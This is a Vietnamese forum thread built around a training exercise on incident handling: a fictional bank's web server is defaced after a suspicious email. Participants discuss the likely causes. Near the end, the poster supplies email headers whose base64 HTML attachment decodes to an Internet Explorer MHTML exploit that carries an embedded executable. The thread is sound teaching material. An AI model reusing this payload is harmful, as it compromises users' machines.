Hello, đã lâu mình không quay lại diễn đàn tin học. Hôm nay vào lại room bảo mật thì thấy room không được sôi động lắm, nên mình quyết định bỏ một chút thời gian ra để viết một bài thử thách các cao thủ về bảo mật trong DDTH. Có gì sơ xót xin niệm tình tha thứ.

„

Một trong những công việc mà giới IT Vietnam mơ thích nhất đó là được làm Network Administrator (dịch tạm tạm là ”Quản trị mạng”) cho một công ty nước ngòai. Thông thường chức vụ này lương thì cũng kha khá, má công việc thì lại nhàn nhã. Tuy nhiên, những vị trí như vậy thường rất là hiếm nên chen chân vào rất khó, đặc biệt là đối với công ty nước ngòai vì họ không coi trọng phần ”quen biết”. Khó khăn hơn nữa là đang trong cơn bùng phát các chứng chỉ quốc tề nào là của Microsoft, Cisco, Oracle. Việc cạnh trang ngày càng gay gắt không những về phần kiến thức mà còn về phần bằng cấp.

Trọng, sinh viên mới tốt nghiệp DHBK, đồng thới được chứng nhận là CCIE trẻ nhất ở Vietnam, đã thắng cuộc trong cuộc đua vào vị trí Network Administrator cua ngân hàng AA. Ở tuổi 21, với mức lương 700USD/tháng, Trọng có thể được coi như là một người thành công trước tuổi, và hiễn nhiên, phải đi kèm với một cô bạn gái thật đẹp.

Ngân hàng AA, nơi Trọng làm là một trong những ngân hàng lớn nhất ở thành phố HCM. Tuy nhiên, vì mới vào làm nên Trọng chỉ được giao quản lý một chi nhánh nhỏ có cấu trúc network như sau :

|-----------|
| Internet |---------ROUTER-------FIREWALL---------DMZ AREA: 1 Web Server
|-----------| |
|
FIREWALL----------- Intranet

(Intranet gồm 1 database server sử dụng Oracle 9i và 40 máy cho nhân viên sử dụng Windows XP Service Pack 1)

• Ngày 29 tháng 7 – 9 giờ sáng

Chuông điện thọai reo khi Trong đang chat với bạn gái qua YIM trong phòng làm việc.
”Alô, Trọng thuộc phòng quản trị mạng đây ! Ai ở đầu dây vậy ? ” Trọng cất tiếng hỏi, hơi khó chịu vì bị cắt ngang cuộc nói chuyện với bạn gái.
”Hello, anh Trọng. Em là Thảo ở phòng Customer Service đây. Em vừa mới nhận được than phiền của một khách hàng nói rằng ổng vừa nhận được một email nói rằng credit card của ổng đã bị đánh cắp. Em đã nói chuyện với khách hàng đó và check credit history của ổng thì thấy không có chuyện gì. Tuy nhiên em cho ổng email của anh và đề nghị ổng send cho anh cái email đó. Anh take a look nhé.”
”Được rồi. Anh sẽ kiểm tra cái email đó khi anh nhận được nó. Bye Thảo”
”Okay. Bye bye” Thảo trả lời gọn lỏn.
Trọng gác điện thọai và trong lòng nực cười về Thảo. Trọng tự nhủ không biết Thảo bị gì mà tại sao lúc nào nói chuyện cũng chêm tiếng Anh hết. Chợt Trọng liếc nhìn cái cái cửa sổ YIM trên màn hình máy tính : ”Bye, honey. See you tonight. Npkitty has logged off the service.”

Trọng thở dài...

• Ngày 29 tháng 7 – 11 giờ trưa

Trọng mở cửa sổ Outlook Express lên và check mail. Từ khi nâng cấp hệ thống máy tính công ty từ Windows 98 lên Windows XP, công ty của Trọng quyết định sử dụng Outlook Express là công cụ email chính trong công ty. Thứ nhất là vì Outlook dễ sử dụng, thứ hai là Outlook đi chung với Windows nên công ty không phải chi tiền mua một software khác.

Cửa sổ của Outlook Express hiện lên : ”You have 5 new messages”. ”Hmm, không có nhiều email lắm, như vậy thì mình có thời gian để kiểm tra cái email của cha nội khách
hàng xem đó là cái gì.” Trọng liết sơ qua cái danh sách email mới, chợt Trọng nhìn thấy
một email có chủ đề là (subject) : ”Fwd : Credit Card của mày đã bị đánh cắp !”. Trọng nghĩ thầm ”À, đây chắc chắn là cái email của ông khách đây”. Kích thước của email này là 60KB và có attachment là một file HTML. Là một CCIE, nên hiển nhiên Trọng đã biết đến các dạng virus lây qua email. Các virus lây qua email thường có attachment là một file có phần đuôi (extension) như sau ”.gif.exe”, ”.pif”... để khi người nhận được email xem cái attachment đó thì virus sẽ tự động chạy và lây lan. Tuy nhiên Trọng chưa bao giờ nghe thấy virus có khả năng lây lan bằng phần đưôi là ”.html” Mặc khác máy tính của Trọng và các máy tính khác trong cơ quan đều có sử dụng Norton Antivirus và đã được cập nhập với phiên bản mới nhất nên nếu có virus trong tập tin HTML thì Norton sẽ báo liền. Nghĩ vậy Trọng click vào cái attachment để xem nó là gì, cửa sổ IE hiện lên. Đó là một trang web màu đen với hàng chữ màu vàng thật lớn ngay ở giữa trang : ”TAO LÀ CƠN ÁC MỘNG CỦA MÀY ĐÂY !”

• Ngày 29 tháng 7 – 12 giờ trưa

”Hello, Thảo ở phòng Customer Service đây” Thảo nhấc điện thọai sau tiếng chuông thứ nhất.
”Alô, Trọng đây”
” Hi, anh Trọng. Có chuyện gì vậy anh ? ”
” À, anh đã xem cái email của ông khách rồi. Không có gì đâu, anh nghĩ đó chỉ là một trò đùa của ai đó thôi. Anh cũng định kiểm tra xem cái mail đó từ đâu tới nhưng lại nghĩ rằng việc đó không thuộc trách nhiệm của mình nên thôi. Nếu ông khách ổng có gọi lại hỏi thì nói ổng yên tâm đi, không có chuyện gì đâu. Em hãy khuyên ổng nên sử dụng một số phần mềm chống SPAM để không phải nhận những email như vậy sau này nữa” Trọng nói một hơi và làm ra vẻ như mình vừa mới nghiên cứu rất dữ dội xong.
” OK, Thank anh Trọng. Tối nay anh rảnh không ? Em định mời anh đi ăn cơm với em.” Thảo hỏi giọng tình tứ
” Ồ, tiếc quá tối nay anh bận rồi. Bữa khác nhe, À , tối mai được không ? ”
”OK, tối mai cũng được. Có gì em sẽ gọi anh.” Thảo trả lời.

• Ngày 29 tháng 7 – 8 giờ tối.

Trọng liếc nhìn trộm cô bạn gái mới quen được 2 tháng của mình. Hạnh, có nick Yahoo là npkitty, là sinh viên đại học Mở TP HCM khoa anh văn. Hạnh đồng thời là người mẫu ở nhà văn hóa Thanh Niên trong những lúc cô không phải đến trường. Hạnh có thể nói là dạng con gái mà bất cứ chàng trai nào cũng mơ ước đến : Đẹp, nói chuyện có duyên và khêu gợi. Trọng rất tự hào về Hạnh, lũ bạn đứa nào cũng tấm tắt khen Trọng hay mới quen được một cô bạn gái như thế. Đang mơ màng nhìn người đẹp trong rạp phim. Bỗng điện thọai cầm tay của Trọng run lên trong túi. Trọng kề môi vào tai người đẹp nói nhỏ ”Anh có điện thọai, anh ra ngòai tí xíu. Sẽ quay lại ngay.”
”OK”, Hạnh trả lời gọn lỏn và không quên lườm Trọng một cái.
”Anh sẽ quay lại liền”, Trọng chồm tới cắn nhẹ vào tai người đẹp và đừng dậy tìm đường ra khỏi phòng chiếu bóng.

• Ngày 29 tháng 7 – 8 giờ 10 tối.

”Hùng hả ? có chuyện gì vậy ?” Trọng cất tiếng hỏi Hùng là người quản trị mạng ban đêm. Ngân hàng AA đang phát triển tốt nên mở rộng thời gian phục vụ đến tận 9 giờ đêm. Hùng là người chịu trách nhiệm quản lý hệ thống ca tối. Trọng vốn đã không thích Hùng từ những ngày Hùng mới được nhận vào làm vì Hùng là lọai người lầm lì ít nói và nhìn vào thì ai cũng cho rằng Hùng là một kẻ hay khinh người.
” Web Server của mình bị hack rồi ” – Hùng nói giọng hơi run run
” Cái gì ? Đừng giỡn chứ ? ” – Trọng hỏi giọng bán tín bán nghi
” Web Server của mình bị hack roi ” – Hùng lập lại mộp lần nữa.
”À, mà hồi nảy anh có gởi email cho tôi nói rằng tôi nên thay đổi cái file .htaccess phải không ?” Hùng hỏi Trọng.
”Đâu có ?”
”Tôi cũng nghĩ là sao có chuyện gì kì vậy. Anh hơi đâu mà kêu tôi làm cái chuyện ba láp như thế. Tuy nhiên tui cũng log vào cái web server để kiểm tra và thấy mọi thứ đều tốt và bình thường cả. Nhưng mà tốt nhất anh nên đến đây liền đi”
”Được rồi tui tời liền. Mà hiện giờ anh đã làm gì rồi” Trọng hỏi mà trong đầu cảm thấy lùng bùng
”Tôi không làm được gì. Password để vào Web Server đã bị thay đổi. Mà cái web server thì đặt trong phòng bảo mật trong khi tôi lại không có chìa khóa vào đó. Tôi đã hỏi anh đưa cho tôi chìa khóa mỗi lần anh hết ca làm vậy mà anh không chịu” – Hùng nói giọng trách móc.
Tim đập thình thịch, Trọng hỏi : ”Vậy chứ nếu bây giờ khách hàng vào www.aabank.vn thì sẽ thấy gì ? ”
”Chỉ một dòng chữ : TAO LÀ CƠN ÁC MỘNG CỦA MÀY ĐÂY !”
-----------------------------------

Giả dụ như bạn là Trọng sau khi vào lại cty. Bạn sẽ làm gì để tìm ra nguyên nhân cũng như khắc phục hậu quả ?

Về phần thông tin. Bạn có thể đề nghị Trí cung cấp bằng cách post ở đây.
Vd : Webserver type, vefrsion, log file, email cua ông khách.... Mình sẽ post lại ở đây trả lời cho bạn.

Chúc vui vẻ cuối tuần.

Lưu ý mình sẽ không post dữ liệu nếu khong có bạn nào yêu cầu vì mình muốn các bạn thực tập incident handling.

To people who read "Hacker Challange" : Bài tập này không nằm trong đó đâu nên bẹn đừng mất công tìm. Bài này là do mình viết dựa trên một bài tập khác cũng do mình viết bằng tiếng Anh trong cái course Security mình dạy.

TO newbies : Welcome ! Mình hy vọng sẽ làm cho bạn nhức óc một chút vào weekend này.

To expert : Nếu bạn đã tìm được câu trả lời thì xin đừng post sớm quá vì đề các bạn khác tìm hiểu nữa.

Thân,

Trihuynh

ok hấp dẫn lắm cám ơn a TH, đúng là trong Hacker Challenger ko có ,lâu gòi mới có cảm giác thú vị thế này , để đọc cái đã hihi

xem kha nang phan tích cua tui ne. Neu dung thi cho 1 trang phao tay nha . hehhee
1 - các đối tượng trong tình huống
Trọng , Hu`ng, Thảo, khách hàng

2 - cấu trúc mạng

|-----------|
| Internet |---------ROUTER-------FIREWALL---------DMZ AREA: 1 Web Server
|-----------| |
|
FIREWALL----------- Intranet
Intranet gồm 1 database server sử dụng Oracle 9i và 40 máy cho nhân viên sử dụng "Windows XP Service Pack 1"
a - cấu trúc mạng yếu , không quản lý được việc phá hoại từ bên trong , recommended ISA server
b - không bao giờ tin tưởng XP để làm server

3 - eMail kì lạ
"60KB và có attachment là một file HTML"
---> virus CÓ khả năng lây lan bằng phần đưôi là ”.html”

4 - những đoạn đối thoại vô lý
”À, mà hồi nảy anh có gởi email cho tôi nói rằng tôi nên thay đổi cái file .htaccess phải không ?”
"Tuy nhiên tui cũng log vào cái web server để kiểm tra và thấy mọi thứ đều tốt và bình thường cả"
”Tôi không làm được gì. Password để vào Web Server đã bị thay đổi. Mà cái web server thì đặt trong phòng bảo mật trong khi tôi lại không có chìa khóa vào đó. "
a - Trọng thực sự ko gửi email, trường hợp trùng hợp do virus hiếm khi xảy ra. yeah, 40% đoán ra được rồi
b - Hùng không có chìa khoá mà vẫn log vô được server ngay trước khi server bị hack. this could be a lie!

5 - dự đoán
a - bị xâm nhập từ bên ngoài 35%
b - bị Hùng phá 55%
c - không biết x-)) 10%
6 - Trọng có lỗi không ?
có , chắc chắn là có. sercurity yếu kém, không biết cách config Apache mà đòi làm CCIE (hehehehe)
7 - khắc phục
với webserver thì mọi việc dễ dàng , nếu có 1 ban code backup. Lý do đơn giản là nó không phải là 1 database server ! Không việc gì phải mệt mỏi cả
8 - lời cuối
chỉ là 1 tình huống giả định, nếu có thực hẵng hay. nếu hạ sách thì cài lại x-) poor Trọng !

1. Về cấu trúc mạng thì mình cho rằng hệ thống như vậy không có gì là yếu kém. Intranet là một mạng LAN gồm 1 một Database Server là Oracle 9i và một loạt các máy cho nhân viên sử dụng Windows XP Service Pack 1 nối với nhau bằng Hub. Mình không hiểu là "không nên tin tưởng dùng XP là Server" là có ý gì ? Phải chăng bạn nhầm chữ "Service Pack" ?

ISA được coi như là một sản phẩm Firewall của Microsoft. Mạng của ngân hàng AA đã có 2 firewall rồi nên nếu đặt thêm một firewall nữa thì sẽ hơi thừa.

2. HTML virus hiện tại vẫn chưa được phát hiện nhiều "In the Wide". HTML virus là một tập tin HTML gồm một đọan mã bằng VBscript hay Javascript ở bên trong với mục đích phá hoại. Windows XP sử dụng IE 6.0 đã được MS patch nên việc HTML virus như vậy xảy ra rất là hiếm. Hơn nữa Trọng sử dụng Norton Antivirus Monitor, nên nếu có Virus trong tập tin thì Norton sẽ báo rồi.

3. Đọan đối thoại vô lý ?
- Hùng nói rằng sau khi nhận được email của Trọng Hùng log vào server để check mọi thứ. Tại thời điểm đó, trang web vẫn bình thưòng và vẫn chưa bị thay đổi. Một lúc sau Hùng mới phát hiện ra việc web server bị hack và gọi cho Trọng.

.htaccess là một chức năng rất tiện dụng của Apache (mình không chắc về khả năng của nó trên IIS). Dù chỉ là một tập tin nhỏ nhưng nó có thể cho phép webmaster làm được nhiều việc như redirect, customize 404 error page, directory password direction... Mặc dù .htaccess có một số lỗi về DoS tuy nhiên trong trường hợp này trang web bị thay doi nên chắc chắn .htaccess không phải là lỗ hổng bị tấn công rồi.

6. Trong chương trình CCIE không có phần nào về Apache hết. CCIE là chương trình thuần Cisco Oriented .Thành ra CCIE không có nghĩa là trùm về Apache :-) (Any CCIE here ? Fix me if i am wrong )
-------------------------
Như vậy thì bí mật vẫn chưa được giải tỏa :)

nếu vậy thì trường hợp máy của Trọng bị hack càng hiếm xảy ra. Cho rằng là Hùng nhận được email ( maybe fake) từ Trọng đi, thì Hùng cũng là 1 kẻ dại dột , he was trapped !
Co`n phần WinXP thì có lẽ tui đoán nhầm, tui đoán là WebServer OS là XP ! sorry
Dù sao thì nguy cơ vị hack đều xuất phát từ Hùng . Có thể trong thời gian log vô webserver thì Hùng bị theo dõi.
But ít's OK. as I said, just a webserver, not datacenter :D . Nothing to worry

Oh, sau khi xem kĩ lại bài của mình. Do copy and paste tu MS Word. Mình không để ý là cái map network của chi nhánh ngân hàng AA bị thay đổi. Xin bạn sửa lại cho mình là cái phần " ---FIREWALL--INTRANET " phải dính liền với phần "ROUTER" thanh mot nha'nh kha'c chứ không phải là INTERNET nhu hien tai. Trong practice lần sau mình sẽ dùng VISIO để vẽ như vậy thì những chuyện đáng tiếc thế xẻ không xảy ra nữa.

Chào bạn,

Tôi cần thêm một số thông tin sau, bạn trihuynh có thể post lên được không :

1. Web server type, version ? Cài trên nền HĐH nào, version, service pack, kernel ?

2. Email fwd của ông khách ?

Dự đoán :

1. NAV, hay bất cứ loại antivirus nào, loại patch Outlook nào đều không tuyệt đối, khả năng virus mới, tự viết v.v... gài trong HTML "qua mặt" được ở tình huống trên tuy thấp nhưng vẫn có thể xảy ra.

2. Email Hùng nhận được là giả mạo, có thể đính kèm những đoạn code nguy hiểm, "theo chân" Hùng xâm nhập vào Web server.

3.Trò đùa ác ý của lão Hùng :)

Thân,
Rain

Ậy đừng nói là file attach html không có virus ...
ngay cả bạn không cần mở file attach chỉ cần xem email thôi. Tôi có thử nghiệm 1 test về lỗi emails, hình như gần 10 email inject đủ loại vuls khác nhau. Mặc dù tôi dùng Lotus notes 5 vẫn bị vướng 1 vul cho phép run lệnh bất kì trên máy của tôi...
-> Việc isolate máy để monitor và admin hệ thống và máy để người quản trị mạng tiếp xúc với các công việc bình thường khác cũng rất quan trọng.

tôi nghĩ nên sử dụng secure id card trước khi access vào monitor hay admin hệ thống thì an toàn hơn. Vì ngay cả máy bạn gặp vấn đề trong khi bạn giao tiếp với bên ngoài hay nội bộ , thì người ta vẫn không thể lợi dụng cái "what you know" như pass để xâm nhập hệ thống chính mà còn phải có cái "what you have" như SID card mà chắc chắn bạn giử gìn cẩn thận rồi ...

Webserver : Apache 1.3.27 chậy trên Mandrake Linux 9.0
Firewall setup vao DMZ nhu sau :

# Allow all localhost connections
$fwcmd add allow tcp from me to any out via lo0 setup keep-state
$fwcmd add deny tcp from me to any out via lo0
$fwcmd add allow ip from me to any out via lo0 keep-state

# Allow all connections from my network card that I initiate
$fwcmd add allow tcp from me to any out xmit any setup keep-state
$fwcmd add deny tcp from me to any
$fwcmd add allow ip from me to any out xmit any keep-state

# Everyone on the Internet is allowed to connect to the following
# services on the machine. This example specifically allows connections
# to sshd and a webserver.
$fwcmd add allow tcp from any to me dst-port 80, 443 in recv any setup keep-state

Email cua ong khach goi cho Trong.

Return-path: <hhhun@yahoo.com>
Envelope-to: ntrong@aabank.vn
Delivery-date: Sun, 28 Jun 2003 03:47:32 -0400
Received: from h00805f773834.nse.cli.ai.com ([213.61.244.31] helo=hehehe)
by venus.vntoday.org with smtp (Exim 3.36 #1)
id 19MMQW-0006pH-00
for ntrong@aabank.vn; Sun, 28 Jun 2003 02:34:45 -0400
From: <hhhun@yahoo.com>
Subject: FWD: Credit card cua may dda bi mat cap
To: ntrong@aabank.vn
Content-Type: multipart/mixed; boundary="=_NextPart_2rfkindysadvnqw3nerasdf"
MIME-Version: 1.0
Reply-To: <hhhun@yahoo.com>
Date: Sun, 28 Jun 2003 03:39:49 -0700
X-Priority: 3
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-Id: <E19MMQW-0006pH-00@venus.vntoday.org>

This is a multi-part message in MIME format

--=_NextPart_2rfkindysadvnqw3nerasdf
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

Credit card cua may dda bi an cap

--=_NextPart_2rfkindysadvnqw3nerasdf
Content-Type: application/octet-stream;
name="email.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="email.html

TUlNRS1WZXJzaW9uOiAxLjANCkNvbnRlbnQtTG9jYXRpb246Zm lsZTovLy9tYWx3YXJlLmV4ZQ0KQ29udGVudC1UcmFuc2Zlci1F bmNvZGluZzogYmFzZTY0DQoNClRWcEVBUVVBQWdBZ0FDRUEvLz kxQUFBQ0FBQ1pBQUFBUGdBQUFBRUErekJxY2dBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUENCkFBQUFBQQ0KQUFBQUFBQjVBQUFBbm dBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQQ0KQUFBQUFBDQpBQUFBQUFBQU FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBDQpBQUFBQUENCkFBQU FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUENCkFBQUFBQQ 0KQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ0KQU FBQUFBDQpBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FBDQpBQUFBQUENCkFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FBQUFBQUENCkFBQUFBQQ0KQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FBQUFBQUFBQUFBQQ0KQUFBQUFBDQpBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FBQUFBQUFBQUFBQUFBQUFBDQpBQUFBQUENCkFBQUFBQUFBQUFB QUFBQUFBQUFBWmpQQU0vK00wNFBESUxsd1A0N0Q4MmFyak1DTz JMZ0FvSTdBdzJhNUFQb0FBR2EvQUENCkFBQUdhKw0KZ1FJQUFH WXp3R2VLbjBBQkFBQUQyTUhqQkN2WUs5aG13Y2dRQTlpc0E5ak I2d1ZuaUI5SDR0N0R1WUErTS84ejl2Tm1wYw0KTWVCb3pZDQpC YUFQanNDNER3Q08yRFBBWjRvRGkvQy9DZ0M1TEFIenBJdndnOG NVdVN3Qjg2UUhIOE93RTgwUXVnOEFqdHErU0FPNnlBDQpNeXdP NUMNCnVRQUQ4MjdvWFA5bU05dm90ZjlUNkc3L3V0b0Q3S2dJZG Z2c3FBaDArK2lXLzF2K3c3UUJ6UlowNExnREFNMFF1QUJNelMN CkVBQUFBQQ0KQUFBQUFBQUFBQUFBQUFDeHdKQWRlNGpaSm12Q3 dZaTR5YVE2aTMrVGpsd3cyeDg2ZjQxWE04R01zWGVZaWRwcjEx eUdmSw0KdW9qaUxRDQoyYUJlaGRrdW9zTnNZMnhGSkw4aGw0N1 FpaHEvd0pzV0pyS2QxNG90czR3a1NhV05LWjh0aDF6R3gxbzRs NVl0S2hYTnBYDQpQTXJxWmQNCmRhUWlzNStNMTNjbXAxYXd1R1 NFRzFyWkhjNnZOanVZZk1NNFRNQWFJaDdQUm5saVloMTQxODl0 Mm45c29pV1h5RXZDeUQNCk53cFNrYw0KR2J1cGFSaWpOSjlSWX pNYk9uMVhnYjBncWRVakdWVk1WYXBpR2FHSkl5dHJNSEtTT1ZL VXFEVnVWOHJNeU11YndYRkdhMg0KRnJLbjV4DQp4MG10T2srcn dWOFZaNmZFUEllUVdZclhaTWdodmh0c2tMRFljNUZRZFVFOFRG YldQNklz***sbDJIYkdPTFZSdVRPMFNHDQpTRVZxaWcNCnJoMm N3aHVEazl0WlZDSjFjSytlR1g1NE5IMWRxcUZlVlVhN3ZoVEZH a1ZlRkR2RmUyMjdRSUd0ZXRKS2pqMjAxbHlweGkNCmJIbUZqRw 0KZmJzVnZualB4WFI4ZGFvcmR5WEJYNmNqd1lyUDEwbFZWSnVF aWxWZE5SOXhKWko1MWMrQ0xpTmRpeldLVG5ZY3huNG1HYQ0KK2 5NampPDQpTU3dzMEJSbk9TMHBnek9DenEzUHpTZ2FIaml3emtF dWUwaE1LOUtTdmN1WEpMZzV3cHhhMmROakY5ZHhHREF3bG1jY2 5sDQpCRldEQ0wNCnhIK0Zta3pKV0xNZjAxTWdKTW5XMEtoYW9V aVNlOU53c25JcXo3V1B3V010SDI0Y3RyTEFMclltR2JVZ3VWd1 VQY2txVVMNCkI2TzdNcg0KenJnL2tLZ3Z6MDdQYUNnYkZMOXZv aHlGaU5DcVhoaTNHaDdHZjltVWJheTFURm13YnNCTlBhVEFXcE JsT0ZNNFlZSEtwRA0KeVdLRWw0DQpobFF2WXk1Q1psY29LNVcv V0Y1UmxWNmlQWEhKcU0ydXdWVFV2Q3FjZHA1RG5vU1NxNlE3Rz crNWRXVmVzenlNbEVHMWs3DQpoWjI4S0gNCjFYWmdZVHRIcVJW K2xxSTRZR0tBbXlwZXk2ZHZSNE0yZ285eUdEZVBJRTdZbnJHYm hUNmpjRitLVkZzdHhxaW5hSTJVSGsNClNrRm9POA0KbVZnK3ha NFZUNXg0T21wL0tqS2ZTREJIV1cwOXFraDlycS9iY3FqWjBTcV l0VW04Tm1zWFJkSSsyemV4WjRDZ21aMlRpWg0KT1FpSkJIDQpX R1ZheE1pQUxvQ2dqM2VhWGsvVHM1STZnUnROelN2WW9WdWZZej dXcHhkVmZIUEprTVV6aFlLeU9YaGt3VHpDZDRCTklUDQplV0tX bEsNCnhrcFR3bVdVYUZTTXAyaDBRSG5IVVZGampvMk5rbHMzTU hKeVI2S09zWVJSSGFKTEpsTllmRnl4T3Blc1ZyZkVRcncvWlkN CklBQUFBQQ0KQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQQ0KQUFBQUFBDQpBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBDQpBQUFBQUENCkFBQUFBQUFBQUFBQUFBQUFBQU FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUENCkFBQUFBQQ0KQUFBQUFBQUFBQUFBQU FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQQ0KQUFBQUFBDQpBQUFBQUFBQU FBQVBBQUFRQUFBUkFBQVNBQUFUQUFBVUFBQVZBQUFXQUFBWEFB QVlBQUFaQUFBYUFBQWJBQUFjQUFBZEFBDQpBZUFBQWYNCkFBQW dBQUFoQUFBaUFBQWpBQUFrQUFBbEFBQW1BQUFuQUFBb0FBQXBB QUFxQUFBckFBQXNBQUF0QUFBdUFBQXZBQUF3QUENCkF4QUFBeQ 0KQUFBekFBQTBBQUExQUFBMkFBQTNBQUE0QUFBNUFBQTZBQUE3 QUFBOEFBQTlBQUErQUFBL0FBQS9BQUEvQUFBL0FRQS9BZw0KQS 9Bd0EvDQpCQUEvQlFBL0JnQS9Cd0EvQ0FBL0NRQS9DZ0EvQ3dB L0RBQS9EUUEvRGdBL0R3QS9FQUEvRVFBL0VnQS9Fd0EvRkFBL0 ZRDQpBL0ZnQS8NCkZ3QS9HQUEvR1FBL0dnQS9Hd0EvSEFBL0hR QS9IZ0EvSHdBL0lBQS9JUUEvSWdBL0l3QS9KQUEvSlFBL0pnQS 9Kd0EvS0ENCkEvS1FBLw0KS2dBL0t3QS9MQUEvTFFBL0xnQS9M d0EvTUFBL01RQS9NZ0EvTXdBL05BQS9OUUEvTmdBL053QS9PQU EvT1FBL09nQS9Pdw0KQS9QQUEvDQpQUUEvUGdBL1B3QS9Qd0Ev UHdBL1B3RS9Qd0kvUHdNL1B3US9Qd1UvUHdZL1B3Yy9Qd2cvUH drL1B3by9Qd3MvUHd3L1B3DQowL1B3NC8NClB3OC9QeEEvUHhF L1B4SS9QeE0vUHhRL1B4VS9QeFkvUHhjL1B4Zy9QeGsvUHhvL1 B4cy9QeHcvUHgwL1B4NC9QeDgvUHkNCkEvUHlFLw0KUHlJL1B5 TS9QeVEvUHlVL1B5WS9QeWMvUHlnL1B5ay9QeW8vUHlzL1B5dy 9QeTAvUHk0L1B5OC9QekEvUHpFL1B6SS9Qeg0KTS9QelEvDQpQ elUvUHpZL1B6Yy9QemcvUHprL1B6by9QenMvUHp3L1B6MC9Qej QvUHo4L1B6OD0NCg0KPCEtLSAyNS4wMi4wMyAtIGh0dHA6Ly93 d3cubWFsd2FyZS5jb20gLS0+DQo8dGl0bGU+bWFsd2FyZS5jb2 08L3RpdGxlPg0KPGJvZHkgYmdjb2xvcj1ibGFjayBzY3JvbGw9 bm8+DQo8U0NSSVBUPg0KLy8yNS4wMi4wMyAtIGh0dHA6Ly93d3 cubWFsd2FyZS5jb20NCmZ1bmN0aW9uIG1hbHdhcmUoKQ0Kew0K cz1kb2N1bWVudC5VUkw7cGF0aD1zLnN1YnN0cigtMCxzLmxhc3 RJbmRleE9mKCJcXCIpKTsNCnBhdGg9dW5lc2NhcGUocGF0aCk7 DQpkb2N1bWVudC53cml0ZSggJyA8dGl0bGU+bWFsd2FyZS5jb2 08L3RpdGxlPjxib2R5IHNjcm9sbD1ubyBiZ2NvbG9yPWJsYWNr PjxGT05UIGZhY2U9IkNvbWljIFNhbnMgTVMiIGNvbG9yPXJlZC BzdHlsZT0icG9zaXRpb246YWJzb2x1dGU7dG9wOjIwO2xlZnQ6 OTA7ei1pbmRleDoxMDA7IGZvbnQtc2l6ZToyY207Ij5tYWx3YX JlLmNvbSA8L2NlbnRlcj48b2JqZWN0IHN0eWxlPSJjdXJzb3I6 Y3Jvc3MtaGFpciIgYWx0PSJtb28gaGEgaGEiIGNsYXNzaWQ9Im Nsc2lkOjY2NjY2NjY2LTY2NjYtNjY2Ni02NjY2IiAgQ09ERUJB U0U9Im1odG1sOicrcGF0aCsnXFxtYWx3YXJlLmh0bWwhZmlsZT ovLy9tYWx3YXJlLmV4ZSI+PC9vYmplY3Q+JykNCn0NCnNldFRp bWVvdXQoIm1hbHdhcmUoKSIsMTUwKQ0KPC9zY3JpcHQ+DQoNCg 0KDQog

xin hỏi mấy câu sau đây:
1. tại sao khi vừa nhắc đến file .htaccess thì Trọng biết đó là file nào liền ? webserver chỉ có một file .htaccess duy nhất ? và mục đích sử dụng của file đó ?
2. có thể nói rõ hơn về quan hệ giữa Trọng, Hùng, Thảo và Hạnh ? ví dụ như Trọng có quen biết Thảo trước đó hông ? Hùng và Thảo quen biết ra sao ? Hehe, có chi tiết rất lạ là Hạnh cũng có vẻ thích xài tiếng Anh lẫn lộn tiếng Việt như Thảo, Trọng có thắc mắc chuyện này hông ?
hehe, chi tiết Thảo rủ Trọng đi ăn tối rất hay :)). Trọng là CCIE mà chẳng có security in mind gì hết, ngay cái chi tiết attachment 66kb mà chỉ có mỗi một dòng chữ là đủ để phải tức tốc kiểm tra rồi. Ngòai ra kẻ tấn công cũng chẳng phải là người cẩn thận, nếu Trọng cẩn thận một tí kiểm tra cái attachement (điều này là bắt buộc làm đối với một người ở vào vị trí quan trọng như Trọng) thì sẽ dễ dàng burn the source.

:D MrOr có vẽ quan tâm đến lãnh vực social engineering quá ha. Là một người quản trị mạng cũng như là Webmaster, việc check .htaccess thuong xuyen cũng rat can vi dde kiem tra xem file co' bi thay đổi không vì nếu bị thay đổi thì fcó khả năng hacker vào được các protected directory trong web server.
Social ENgineering minh sẽ nghiên cứu sau (mặc dù nó rất interesting trong trường hợp này). :-) Thank for remind me that Mrror.

TO $$$, minh nghi lotus note client ít bị virus hơn OUTLOOK vi OUTLOOK intergrate với IE mà IE thì đầy bugs. Lotus Note nếu chỉnh cái ECL đúng thì cũng secure lắm. Thank for sharing your experience.

cho coi sơ qua cái file log access và error của apache nhé. xem 10 dòng trước khi bị hack và 10 dòng sau khi bị hack.
